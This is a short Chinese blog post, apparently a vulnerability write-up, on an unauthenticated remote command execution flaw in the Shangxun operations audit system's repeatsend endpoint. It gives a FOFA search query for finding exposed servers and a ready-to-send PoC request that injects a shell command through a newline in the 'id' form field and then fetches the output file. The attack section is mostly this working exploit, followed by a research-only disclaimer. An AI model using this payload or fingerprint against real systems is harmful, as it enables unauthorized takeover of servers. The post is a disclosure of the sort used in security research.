字数 335,阅读大约需 2 分钟
漏洞简介
上讯信息运维管理审计系统 repeatsend 远程命令执行,未经身份验证的远程攻击者可利用此漏洞写入后门文件,执行任意命令,导致服务器被控。
FOFA
body="default/getloginhtml"
POC
POST/emailapply/RepeatSendHTTP/1.1Host: Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.850.86 Safari/537.36id='%0id > 123.txt%0a'
GET/123.txtHTTP/1.1Host:
噢,对了这个漏洞没用到代码审计的技能,只不过是前人栽树后人乘凉罢了。
懂的都懂
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论